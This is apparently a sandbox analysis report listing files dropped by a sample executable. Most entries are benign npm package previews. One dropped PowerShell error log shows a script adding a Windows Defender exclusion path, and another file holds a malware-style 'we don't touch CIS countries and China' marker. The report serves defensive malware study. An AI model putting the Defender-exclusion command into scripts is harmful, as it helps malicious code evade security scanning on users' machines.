              SHA-512:E3E9F0E7013FDCD8CEAE1038388B3FCFB65C9FEBEC66341692A6A8A7260209C97DF6343C0CB25647A59CE9916093DC0F9DD9B2C6EEB6BCBF16405B19AE61717F
              Malicious:false
              Reputation:unknown
              Preview:# Documentation..- [API Reference](https://github.com/JoshGlazebrook/socks#api-reference)..- [Code Examples](./examples/index.md)
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):2629
              Entropy (8bit):4.809588464716638
              Encrypted:false
              SSDEEP:
              MD5:1DD9A1AD1A510196BCE1345EC5B7C098
              SHA1:D319C2E14997ECB24CC217A69F0060C4676CC446
              SHA-256:4CF23D36F5E98EC2DCD285FDBDEE1DB8B177C1DCAC386607B57087CA14DC3EBD
              SHA-512:5A55BF5413B60C3FFC065BDC34E23C2F1C031CEC256B492E0F2C80A32D58110BA2B8E060D425339C928EBF1680C5A79729DA126DC838DA514BF5B2521DA9717D
              Malicious:false
              Reputation:unknown
              Preview:# socks..## Migrating from v1..For the most part, migrating from v1 takes minimal effort as v2 still supports factory creation of proxy connections with callback support...### Notable breaking changes..- In an options object, the proxy 'command' is now required and does not default to 'connect'..- **In an options object, 'target' is now known as 'destination'.**.- Sockets are no longer paused after a SOCKS connection is made, so socket.resume() is no longer required. (Please be sure to attach data handlers immediately to the Socket to avoid losing data)..- In v2, only the 'connect' command is supported via the factory SocksClient.createConnection function. (BIND and ASSOCIATE must be used with a SocksClient instance via event handlers)..- In v2, the factory SocksClient.createConnection function callback is called with a single object rather than separate socket and info object..- A SOCKS http/https agent is no longer bundled into the library...For informational purposes, here is the or
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):1609
              Entropy (8bit):4.935054948151018
              Encrypted:false
              SSDEEP:
              MD5:E32E801B5C4981B343EE767743EC2C7B
              SHA1:C40A5879E66B32E8B9BDCFB4E5FA654530190A39
              SHA-256:71254BF50C6AA310311263DD5E1F3697770BE875E52154171B481797CAAC89D7
              SHA-512:498CBE8FB03D70C5A4B87258C8FC21BD22F10F55C5F1BA2546AF4864DD8AA0A07EB0469BFCE7C1BCDFB7325AA2EFA03B965301A87B50F07807279BE006BBCA7C
              Malicious:false
              Reputation:unknown
              Preview:{. "name": "socks",. "private": false,. "version": "2.7.1",. "description": "Fully featured SOCKS proxy client supporting SOCKSv4, SOCKSv4a, and SOCKSv5. Includes Bind and Associate functionality.",. "main": "build/index.js",. "typings": "typings/index.d.ts",. "homepage": "https://github.com/JoshGlazebrook/socks/",. "repository": {. "type": "git",. "url": "https://github.com/JoshGlazebrook/socks.git". },. "bugs": {. "url": "https://github.com/JoshGlazebrook/socks/issues". },. "keywords": [. "socks",. "proxy",. "tor",. "socks 4",. "socks 5",. "socks4",. "socks5". ],. "engines": {. "node": ">= 10.13.0",. "npm": ">= 3.0.0". },. "author": "Josh Glazebrook",. "contributors": [. "castorw". ],. "license": "MIT",. "readmeFilename": "README.md",. "devDependencies": {. "@types/ip": "1.1.0",. "@types/mocha": "^9.1.1",. "@types/node": "^18.0.6",. "@typescript-eslint/eslint-plugin": "^5.30.6",. "@typescript-eslint/parser": "
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):11358
              Entropy (8bit):4.4267168336581415
              Encrypted:false
              SSDEEP:
              MD5:3B83EF96387F14655FC854DDC3C6BD57
              SHA1:2B8B815229AA8A61E483FB4BA0588B8B6C491890
              SHA-256:CFC7749B96F63BD31C3C42B5C471BF756814053E847C10F3EB003417BC523D30
              SHA-512:98F6B79B778F7B0A15415BD750C3A8A097D650511CB4EC8115188E115C47053FE700F578895C097051C9BC3DFB6197C2B13A15DE203273E1A3218884F86E90E8
              Malicious:false
              Reputation:unknown
              Preview:. Apache License. Version 2.0, January 2004. http://www.apache.org/licenses/.. TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION.. 1. Definitions... "License" shall mean the terms and conditions for use, reproduction,. and distribution as defined by Sections 1 through 9 of this document... "Licensor" shall mean the copyright owner or entity authorized by. the copyright owner that is granting the License... "Legal Entity" shall mean the union of the acting entity and all. other entities that control, are controlled by, or are under common. control with that entity. For the purposes of this definition,. "control" means (i) the power, direct or indirect, to cause the. direction or management of such entity, whether by contract or. otherwise, or (ii) ownership of fifty percent (50%) or more of the. outstanding shares, or (iii) beneficial own
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):10753
              Entropy (8bit):5.147878631451199
              Encrypted:false
              SSDEEP:
              MD5:1CBE456F54F89AB119ABD582B46EC737
              SHA1:BD8E631A674FD29F75548547DA756954BB8253A7
              SHA-256:BF6AAA22F934F48C945A0302EFF34D6E0EDB265FA06917F82CD41551465C8F6C
              SHA-512:8B0901EB58E9A1C772687876B5BCE026867A9586D34CD6A3FCAC4D5927B3BD4DFD7F62EAC39C17EE1CE226A17C09A2E32FFA773C9BAE1F5BFD927481480450D9
              Malicious:false
              Reputation:unknown
              Preview:/*.Copyright spdx-correct.js contributors..Licensed under the Apache License, Version 2.0 (the "License");.you may not use this file except in compliance with the License..You may obtain a copy of the License at.. http://www.apache.org/licenses/LICENSE-2.0..Unless required by applicable law or agreed to in writing, software.distributed under the License is distributed on an "AS IS" BASIS,.WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied..See the License for the specific language governing permissions and.limitations under the License..*/.var parse = require('spdx-expression-parse').var spdxLicenseIds = require('spdx-license-ids')..function valid (string) {. try {. parse(string). return true. } catch (error) {. return false. }.}..// Sorting function that orders the given array of transpositions such.// that a transposition with the longer pattern comes before a transposition.// with a shorter pattern. This is to prevent e.g. the transposition.// ["Ge
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):724
              Entropy (8bit):4.681204913490077
              Encrypted:false
              SSDEEP:
              MD5:B4BA59EB9535EEC2410B41A92130F73F
              SHA1:A7A8F7467469C676A88934B972D08C03C9A4B7B4
              SHA-256:4D5B264748A7510AD96A135DEBDAE4833A62506BFC95DF06C70D657096DF6AAA
              SHA-512:9427B250931FD38A21781A34F71C9C3F4DA2D669F85C4E0519D084821B37223265EC4D0D3C5D46C2EDC5B917CA9EF863A7943C8794FBF976A0F4C285ED3266BD
              Malicious:false
              Reputation:unknown
              Preview:{. "name": "spdx-correct",. "description": "correct invalid SPDX expressions",. "version": "3.2.0",. "dependencies": {. "spdx-expression-parse": "^3.0.0",. "spdx-license-ids": "^3.0.0". },. "devDependencies": {. "defence-cli": "^3.0.1",. "replace-require-self": "^1.0.0",. "standard": "^14.3.4",. "standard-markdown": "^6.0.0",. "tape": "^5.0.1". },. "files": [. "index.js". ],. "keywords": [. "SPDX",. "law",. "legal",. "license",. "metadata". ],. "license": "Apache-2.0",. "repository": "jslicense/spdx-correct.js",. "scripts": {. "lint": "standard && standard-markdown README.md",. "test": "defence README.md | replace-require-self | node && node test.js". }.}.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):1009
              Entropy (8bit):4.839996396532227
              Encrypted:false
              SSDEEP:
              MD5:1DE0D8927FE911B16A64953129B772A7
              SHA1:F0ED959C32C0610429A0B79DF837104FF580FB90
              SHA-256:FB214B95BDFCE683A9EF080C3BA7A10BF45F7FDE3DCE422DBB3236C12783151A
              SHA-512:71FA86430D75664FFC814167A91D3AF6B1C75A781FF0EC22C1CE3D116D0E90CCB70173FF077C92F71A092B9F611B54B514C9530E44824C2637BA8389070EE5A7
              Malicious:false
              Reputation:unknown
              Preview:[. "389-exception",. "Autoconf-exception-2.0",. "Autoconf-exception-3.0",. "Bison-exception-2.2",. "Bootloader-exception",. "Classpath-exception-2.0",. "CLISP-exception-2.0",. "DigiRule-FOSS-exception",. "eCos-exception-2.0",. "Fawkes-Runtime-exception",. "FLTK-exception",. "Font-exception-2.0",. "freertos-exception-2.0",. "GCC-exception-2.0",. "GCC-exception-3.1",. "gnu-javamail-exception",. "GPL-3.0-linking-exception",. "GPL-3.0-linking-source-exception",. "GPL-CC-1.0",. "i2p-gpl-java-exception",. "Libtool-exception",. "Linux-syscall-note",. "LLVM-exception",. "LZMA-exception",. "mif-exception",. "Nokia-Qt-exception-1.1",. "OCaml-LGPL-linking-exception",. "OCCT-exception-1.0",. "OpenJDK-assembly-exception-1.0",. "openvpn-openssl-exception",. "PS-or-PDF-font-exception-20170817",. "Qt-GPL-exception-1.0",. "Qt-LGPL-exception-1.1",. "Qwt-exception-1.0",. "Swift-exception",. "u-boot-exception-2.0",. "Universal-FOSS-exception-1.0",. "WxWindows-exceptio
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):408
              Entropy (8bit):4.810748884743821
              Encrypted:false
              SSDEEP:
              MD5:39574483A6BE9B11884D0CD2812D3CEF
              SHA1:0EC1694E2F10AD1545E9132CDE02FE7A82F9D320
              SHA-256:C6599B1734F3A73204866986A5E938740C96788359C3158ED61EE6236CAC3EA5
              SHA-512:34DFBCC13142DA5804E48EDBDF95321086FF20746443244350408BA30BA17ACBEC2567967808E612773C5F443E78AC1143ACED54D21CF6B51E9D4ACA44E2C2AD
              Malicious:false
              Reputation:unknown
              Preview:{. "name": "spdx-exceptions",. "description": "list of SPDX standard license exceptions",. "version": "2.3.0",. "author": "The Linux Foundation",. "contributors": [. "Kyle E. Mitchell <kyle@kemitchell.com> (https://kemitchell.com/)". ],. "license": "CC-BY-3.0",. "repository": "kemitchell/spdx-exceptions.json",. "files": [. "index.json". ],. "scripts": {. "build": "node build.js". }.}.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):203
              Entropy (8bit):4.575141267988618
              Encrypted:false
              SSDEEP:
              MD5:71E34838130037A6B1C1F036AF5004A3
              SHA1:448B07AAC5B6DE983FB89D4B686B3E708F34D844
              SHA-256:44BA6C2BC625F3B99BCE248A62B29B088538F4F337F9E04679547C1195E634A4
              SHA-512:11B11427179AB0822F18DE5DD5007DCC73A68B460C4C3CF807BC6CE3C157DE08C802F33721DCB1E77B36C4E5D2A3EC2F8C651C1D7C5B05A7B71B10DD1E5C0F4A
              Malicious:false
              Reputation:unknown
              Preview:C. Scott Ananian <cscott@cscott.net> (http://cscott.net).Kyle E. Mitchell <kyle@kemitchell.com> (https://kemitchell.com).Shinnosuke Watanabe <snnskwtnb@gmail.com>.Antoine Motet <antoine.motet@gmail.com>.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):1111
              Entropy (8bit):5.096715362620865
              Encrypted:false
              SSDEEP:
              MD5:35A411D082D4487AB0E0287014CDDF80
              SHA1:A9293189DDFD959FFB54EF7805B1EAB21979D700
              SHA-256:7EDB57F7065309027DE249642341292A5B21410D5773CC55BBA73FF9CF01060E
              SHA-512:BE6A19AE3FD0E2497EC3E07688464B92E8099D1D4F270133DA02A582FCFF982B63F8811177EC7921CA4D8527E232676CF0DCE6967C7762CA0029D38AA6A5E87E
              Malicious:false
              Reputation:unknown
              Preview:The MIT License..Copyright (c) 2015 Kyle E. Mitchell & other authors listed in AUTHORS..Permission is hereby granted, free of charge, to any person obtaining.a copy of this software and associated documentation files (the."Software"), to deal in the Software without restriction, including.without limitation the rights to use, copy, modify, merge, publish,.distribute, sublicense, and/or sell copies of the Software, and to.permit persons to whom the Software is furnished to do so, subject to.the following conditions:..The above copyright notice and this permission notice shall be included.in all copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,.EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF.MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT..IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY.CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,.TORT OR OT
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):143
              Entropy (8bit):4.371863201471327
              Encrypted:false
              SSDEEP:
              MD5:40825D7F343919005E5809025C14876B
              SHA1:7D9B17E093B4706955E0B8991ED0D48F5739A40F
              SHA-256:108D9F96D7901B70F3CF4EA369EE2C7B3C47E28D23B9BB67A69A559831D245BF
              SHA-512:0C2953C196E4A86F4000EDD8511DBD0510127E86F8DF1F44FCC27502C1D6A74187F2F1A5F91B85D807939DEFF039D6E66ECBC9AA4D8B14C4C2261BB233071386
              Malicious:false
              Reputation:unknown
              Preview:'use strict'..var scan = require('./scan').var parse = require('./parse')..module.exports = function (source) {. return parse(scan(source)).}.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):912
              Entropy (8bit):4.690400720080528
              Encrypted:false
              SSDEEP:
              MD5:9DA13B6BBCD9C2EC5782FE1B0C0D795E
              SHA1:72082A3E9D4EFE5A06C914B7FFA738F35B550FFB
              SHA-256:019A60839CF6B909B3F7F7079888EDCE8D9AA7DE6C296BB4EF7E2DF587173AFB
              SHA-512:45A877AF8613CDF2AA8FE5549942B6BF5E72337E42C258016381779BD751526391EFE95F4E6B619A18CEF8161FB6BB5C7CA9BA58C24D5129664CB12D18C00C54
              Malicious:false
              Reputation:unknown
              Preview:{. "name": "spdx-expression-parse",. "description": "parse SPDX license expressions",. "version": "3.0.1",. "author": "Kyle E. Mitchell <kyle@kemitchell.com> (https://kemitchell.com)",. "files": [. "AUTHORS",. "index.js",. "parse.js",. "scan.js". ],. "dependencies": {. "spdx-exceptions": "^2.1.0",. "spdx-license-ids": "^3.0.0". },. "devDependencies": {. "defence-cli": "^3.0.1",. "replace-require-self": "^1.0.0",. "standard": "^14.1.0". },. "keywords": [. "SPDX",. "law",. "legal",. "license",. "metadata",. "package",. "package.json",. "standards". ],. "license": "MIT",. "repository": "jslicense/spdx-expression-parse.js",. "scripts": {. "lint": "standard",. "test:readme": "defence -i javascript README.md | replace-require-self | node",. "test:suite": "node test.js",. "test": "npm run test:suite && npm run test:readme". }.}.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):2901
              Entropy (8bit):4.496225579412517
              Encrypted:false
              SSDEEP:
              MD5:BF8B106D12F806EA2DAFB4410ADE5001
              SHA1:F86A533BD13FF24966957E11BDB506EE7A91DBAF
              SHA-256:629D3BEF1A8EA96455646D2D0594949FE6C332B2BE95FD7D2B6502A918C423C1
              SHA-512:036A8791741E116193F8EF7036CDAD5F8A34FCD3B2134EA59A441EF797861DF68F63E28292407FCB34950A1BEB37E62A6FC6C4352953D762D98C4C9AD7768982
              Malicious:false
              Reputation:unknown
              Preview:'use strict'..// The ABNF grammar in the spec is totally ambiguous..//.// This parser follows the operator precedence defined in the.// `Order of Precedence and Parentheses` section...module.exports = function (tokens) {. var index = 0.. function hasMore () {. return index < tokens.length. }.. function token () {. return hasMore() ? tokens[index] : null. }.. function next () {. if (!hasMore()) {. throw new Error(). }. index++. }.. function parseOperator (operator) {. var t = token(). if (t && t.type === 'OPERATOR' && operator === t.string) {. next(). return t.string. }. }.. function parseWith () {. if (parseOperator('WITH')) {. var t = token(). if (t && t.type === 'EXCEPTION') {. next(). return t.string. }. throw new Error('Expected exception after `WITH`'). }. }.. function parseLicenseRef () {. // TODO: Actually, everything is concatenated into one string. // for backward-compatibility but
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):2754
              Entropy (8bit):4.565631049679228
              Encrypted:false
              SSDEEP:
              MD5:38B1F87B7693B050F073300839B4E553
              SHA1:6CE4F78704ADBA89F90F4420365A306CB1BBEEE8
              SHA-256:B3C4DCD0AF9B6E72CD1C56335DB37447657114E8201271653BF35C5BFE7AFBA6
              SHA-512:9D8E59422099A45AE7060F0D7B8349D95A513B03CEC4C6D8B2C8D3CCDE34972EBE7450758B07D0E534F0DF8FBB0042CBF5610DF889B280294A550186D3C47D0E
              Malicious:false
              Reputation:unknown
              Preview:'use strict'..var licenses = []. .concat(require('spdx-license-ids')). .concat(require('spdx-license-ids/deprecated')).var exceptions = require('spdx-exceptions')..module.exports = function (source) {. var index = 0.. function hasMore () {. return index < source.length. }.. // `value` can be a regexp or a string.. // If it is recognized, the matching source string is returned and. // the index is incremented. Otherwise `undefined` is returned.. function read (value) {. if (value instanceof RegExp) {. var chars = source.slice(index). var match = chars.match(value). if (match) {. index += match[0].length. return match[0]. }. } else {. if (source.indexOf(value, index) === index) {. index += value.length. return value. }. }. }.. function skipWhitespace () {. read(/[ ]*/). }.. function operator () {. var string. var possibilities = ['WITH', 'AND', 'OR', '(', ')', ':', '+']. for (var i = 0; i < pos
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):580
              Entropy (8bit):4.82875530502796
              Encrypted:false
              SSDEEP:
              MD5:AD0BFCD6EAE2D786332E9B59135AE092
              SHA1:A02AA8FFBF58AB0179B51D578DF0AC75FA810CD6
              SHA-256:6A132D20E843D088AE94B5C47B185B8528EB5AAAD82630DCEF82D63CFDD1F249
              SHA-512:473A499000E77D9E9E94AC38AE8FE819829E9FB1E1F20F477E6A367229AC1AB97BD7339666D6F8DF0C80488FA0BCEE1086DEFC57982652FA923DF1D2E7E85247
              Malicious:false
              Reputation:unknown
              Preview:[.."AGPL-1.0",.."AGPL-3.0",.."BSD-2-Clause-FreeBSD",.."BSD-2-Clause-NetBSD",.."GFDL-1.1",.."GFDL-1.2",.."GFDL-1.3",.."GPL-1.0",.."GPL-1.0+",.."GPL-2.0",.."GPL-2.0+",.."GPL-2.0-with-GCC-exception",.."GPL-2.0-with-autoconf-exception",.."GPL-2.0-with-bison-exception",.."GPL-2.0-with-classpath-exception",.."GPL-2.0-with-font-exception",.."GPL-3.0",.."GPL-3.0+",.."GPL-3.0-with-GCC-exception",.."GPL-3.0-with-autoconf-exception",.."LGPL-2.0",.."LGPL-2.0+",.."LGPL-2.1",.."LGPL-2.1+",.."LGPL-3.0",.."LGPL-3.0+",.."Nunit",.."StandardML-NJ",.."bzip2-1.0.5",.."eCos-2.0",.."wxWindows".].
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):8915
              Entropy (8bit):5.0963562398252735
              Encrypted:false
              SSDEEP:
              MD5:2525C1C7F5F3828AC8D1A087BB5406FC
              SHA1:3D79AF7B25A0D8654F06FB3875F4E11D7427059B
              SHA-256:4525B9F9FCAC66BD5EC345F3BC095B69CBCFEB7B33AFDF37FC7A93E57FC85C66
              SHA-512:34AC4B98CB5C8600E93C6C9EF04E76CA68606262F6750E1F3D53812C42BC7D4FDE32B75BD6501BA92F29EBAF0F66208E54BC236DDBE8C0190E8A9ACEAB997158
              Malicious:false
              Reputation:unknown
              Preview:[.."0BSD",.."AAL",.."ADSL",.."AFL-1.1",.."AFL-1.2",.."AFL-2.0",.."AFL-2.1",.."AFL-3.0",.."AGPL-1.0-only",.."AGPL-1.0-or-later",.."AGPL-3.0-only",.."AGPL-3.0-or-later",.."AMDPLPA",.."AML",.."AMPAS",.."ANTLR-PD",.."ANTLR-PD-fallback",.."APAFML",.."APL-1.0",.."APSL-1.0",.."APSL-1.1",.."APSL-1.2",.."APSL-2.0",.."ASWF-Digital-Assets-1.0",.."ASWF-Digital-Assets-1.1",.."Abstyles",.."AdaCore-doc",.."Adobe-2006",.."Adobe-Glyph",.."Adobe-Utopia",.."Afmparse",.."Aladdin",.."Apache-1.0",.."Apache-1.1",.."Apache-2.0",.."App-s2p",.."Arphic-1999",.."Artistic-1.0",.."Artistic-1.0-Perl",.."Artistic-1.0-cl8",.."Artistic-2.0",.."BSD-1-Clause",.."BSD-2-Clause",.."BSD-2-Clause-Patent",.."BSD-2-Clause-Views",.."BSD-3-Clause",.."BSD-3-Clause-Attribution",.."BSD-3-Clause-Clear",.."BSD-3-Clause-HP",.."BSD-3-Clause-LBNL",.."BSD-3-Clause-Modification",.."BSD-3-Clause-No-Military-License",.."BSD-3-Clause-No-Nuclear-License",.."BSD-3-Clause-No-Nuclear-License-2014",.."BSD-3-Clause-No-Nuclear-Warranty",.."BSD-3-Cla
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):756
              Entropy (8bit):4.803757326809795
              Encrypted:false
              SSDEEP:
              MD5:3565C405B6B21B6D7AA3A38AFFBA0332
              SHA1:5996C0CEF6AE77708A279F423C812DE4A90C9C9D
              SHA-256:6D1B14D2F6F141CDECB016E4E1B8690A5EA29B6BE37F90112C705835D8A84A8B
              SHA-512:E3C1D034AAEA56BF21C64D06B5CCD67D31F2330A09990E923F0DBC993B4E8349653F2B630822D9AED0099ABD986C5E2349FB0DF776AF853FF236EB750FDB2011
              Malicious:false
              Reputation:unknown
              Preview:{.."name": "spdx-license-ids",.."version": "3.0.16",.."description": "A list of SPDX license identifiers",.."repository": "jslicense/spdx-license-ids",.."author": "Shinnosuke Watanabe (https://github.com/shinnn)",.."license": "CC0-1.0",.."scripts": {..."build": "node build.js",..."pretest": "eslint .",..."latest": "node latest.js",..."test": "node test.js"..},.."files": [..."deprecated.json",..."index.json"..],.."keywords": [..."spdx",..."license",..."licenses",..."id",..."identifier",..."identifiers",..."json",..."array",..."oss"..],.."devDependencies": {..."@shinnn/eslint-config": "^7.0.0",..."eslint": "^8.49.0",..."eslint-formatter-codeframe": "^7.32.1",..."rmfr": "^2.0.0",..."tape": "^5.6.6"..},.."eslintConfig": {..."extends": "@shinnn"..}.}.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):760
              Entropy (8bit):5.01235843212743
              Encrypted:false
              SSDEEP:
              MD5:E1E465D0F0648BFF1FE285726C8D5ADF
              SHA1:1DD68471437A7F23E484C9A00043BC2CD4485C3C
              SHA-256:3749709146345FA15546AABA4E3AB1B3B92A4D930077B5BC32D90815CB63AFAF
              SHA-512:63695758D550457C0727C3D45DD5A9740DF567EB5B38CFF7615C24C8133438287FCED68316577707E6AB23DE79EC991FA7C45990B88E5ED9B3D0DA36DF52110F
              Malicious:false
              Reputation:unknown
              Preview:ISC License..Copyright 2021 (c) npm, Inc...Permission to use, copy, modify, and/or distribute this software for.any purpose with or without fee is hereby granted, provided that the.above copyright notice and this permission notice appear in all copies...THE SOFTWARE IS PROVIDED "AS IS" AND THE COPYRIGHT HOLDER DISCLAIMS.ALL WARRANTIES WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED.WARRANTIES OF MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE.COPYRIGHT HOLDER BE LIABLE FOR ANY SPECIAL, DIRECT, INDIRECT, OR.CONSEQUENTIAL DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING FROM LOSS.OF USE, DATA OR PROFITS, WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE.OR OTHER TORTIOUS ACTION, ARISING OUT OF OR IN CONNECTION WITH THE.USE OR PERFORMANCE OF THIS SOFTWARE..
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:C++ source, Unicode text, UTF-8 text
              Category:dropped
              Size (bytes):16060
              Entropy (8bit):4.838641045192944
              Encrypted:false
              SSDEEP:
              MD5:54CD91B88715FDB77E25DD1491A89EA6
              SHA1:13F9D79749DC1B444EEC43FB59407F100F541E40
              SHA-256:3F6739B77CDB076A1645BFF911C13FE82F3C38BB2FF5E4C127B2A2FDFE122114
              SHA-512:9AC21DC625D3DB4DCC3286F414218D4ABACC607BDB9F9FADCB8B5408D1A236A66D33DA966927CA723FABE58ADA8BB73040FC29E4769E5781E7D727313D87F417
              Malicious:false
              Reputation:unknown
              Preview:'use strict'..const crypto = require('crypto').const { Minipass } = require('minipass')..const SPEC_ALGORITHMS = ['sha512', 'sha384', 'sha256'].const DEFAULT_ALGORITHMS = ['sha512']..// TODO: this should really be a hardcoded list of algorithms we support,.// rather than [a-z0-9]..const BASE64_REGEX = /^[a-z0-9+/]+(?:=?=?)$/i.const SRI_REGEX = /^([a-z0-9]+)-([^?]+)([?\S*]*)$/.const STRICT_SRI_REGEX = /^([a-z0-9]+)-([A-Za-z0-9+/=]{44,88})(\?[\x21-\x7E]*)?$/.const VCHAR_REGEX = /^[\x21-\x7E]+$/..const getOptString = options => options?.length ? `?${options.join('?')}` : ''..class IntegrityStream extends Minipass {. #emittedIntegrity. #emittedSize. #emittedVerified.. constructor (opts) {. super(). this.size = 0. this.opts = opts.. // may be overridden later, but set now for class consistency. this.#getOptions().. // options used for calculating stream. can't be changed.. if (opts?.algorithms) {. this.algorithms = [...opts.algorithms]. } else {. this.
              Process:C:\Windows\SysWOW64\msiexec.exe
              File Type:ASCII text, with CRLF line terminators
              Category:dropped
              Size (bytes):17
              Entropy (8bit):3.4104172527605203
              Encrypted:false
              SSDEEP:
              MD5:460071F799F482B73D31DC844F80C3CA
              SHA1:A8E7AF7FEBF196F14CA4C2A47BF22AB054AE5CDC
              SHA-256:434B5D7B02D79D0350D62B559EE5AE2B3EA5A32FF8088397E703465A9E5E6289
              SHA-512:AFEA793A7D96E61FB82055F85C8AA725F479E4CD558D96D72B82FB75D8165F0ED837F666F3BA073C0F6FB781F3A52245EC983AFC905FD4EB225486164F5E45CE
              Malicious:false
              Reputation:unknown
              Preview:False..True..OK..
              Process:C:\Windows\SysWOW64\msiexec.exe
              File Type:ASCII text, with CRLF line terminators
              Category:dropped
              Size (bytes):4710
              Entropy (8bit):5.121655052822185
              Encrypted:false
              SSDEEP:
              MD5:5AC9A09AD7129CDF8018420436941436
              SHA1:9FAF44B5914F417F3837B5AE1912DEE31F743009
              SHA-256:80099596C7145A9AABE154DEB7F20A49E7DD2F6FE98FEC794688F9C012109D04
              SHA-512:6D4EE5024EF97BD625E97D659F40D52FC7D097E240255AFF344545C1E9A33BD3B4CDF6D4922218F3D9FDD54BCD8F7DB8B59E73E879E2E4F0459D5C8850263236
              Malicious:false
              Reputation:unknown
              Preview:Add-MpPreference : Operation failed with the following error: 0x800106ba. Operation: MpPreference. Target: ..ConfigListExtension...At C:\Users\user\AppData\Local\Temp\scrC369.ps1:102 char:1..+ Add-MpPreference -ExclusionPath "$vrer2" -Force..+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~.. + CategoryInfo : NotSpecified: (MSFT_MpPreference:root\Microsoft\...FT_MpPreference) [Add-MpPreference], .. CimException.. + FullyQualifiedErrorId : HRESULT 0x800106ba,Add-MpPreference.. ..Add-MpPreference : Operation failed with the following error: 0x%1!x!..At C:\Users\user\AppData\Local\Temp\scrC369.ps1:102 char:1..+ Add-MpPreference -ExclusionPath "$vrer2" -Force..+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~.. + CategoryInfo : NotSpecified: (MSFT_MpPreference:root\Microsoft\...FT_MpPreference) [Add-MpPreference], .. CimException.. + FullyQualifiedErrorId : HRESULT 0x800106ba,Add-MpPreference.. ..Add-MpPreference : Operation failed with the following err
              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              File Type:ASCII text, with no line terminators
              Category:dropped
              Size (bytes):60
              Entropy (8bit):4.038920595031593
              Encrypted:false
              SSDEEP:
              MD5:D17FE0A3F47BE24A6453E9EF58C94641
              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
              Malicious:false
              Reputation:unknown
              Preview:# PowerShell test file to determine AppLocker lockdown mode
              Process:C:\Windows\System32\cmd.exe
              File Type:ASCII text, with very long lines (8190), with CRLF, CR line terminators
              Category:dropped
              Size (bytes):8193
              Entropy (8bit):0.008325662656503996
              Encrypted:false
              SSDEEP:
              MD5:3FD78AC884F3B867FD1FAF2EAA0CCF71
              SHA1:7ACC08E8F717AC7C18EBA4B664F93D1CAD7DC335
              SHA-256:97566C4DE0556852DDA6ECA5098EA584D466D382FCEE57E14B4F981203BAE5FD
              SHA-512:BCBC71FFBA452769DC67981CBB93C6795D2BFAF874C2323AA773EF3F01CB34F080B7ADEFAEF123196669D4BE5639CB4C2F05C8484EC1B613A36082D4ED841F70
              Malicious:false
              Reputation:unknown
              Preview
              Process:C:\Windows\SysWOW64\msiexec.exe
              File Type:Unicode text, UTF-16, little-endian text, with no line terminators
              Category:dropped
              Size (bytes):78
              Entropy (8bit):3.1002638147659636
              Encrypted:false
              SSDEEP:
              MD5:263604C90BD2E99794D7A0C002B45542
              SHA1:1B947562AD1AAE7D8BF79D48354529A1EE655C86
              SHA-256:26121CB70F66C1AF4993871F580F803EB4C4F9A1FDC1EE85DE1ABE0D063CE0EA
              SHA-512:D19A7E3EC825C3BB4B11BBE6E4780C8F36FF88E1A589543BF14696D6FC84E4FC953093D755CED5A0C5A2A8EC08CE35861158BA72F049324D70DE73395F780A02
              Malicious:false
              Reputation:unknown
              Preview:..w.e. .d.o.n.'.t. .t.o.u.c.h. .C.I.S. .c.o.u.n.t.r.i.e.s. .a.n.d. .C.h.i.n.a.
              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
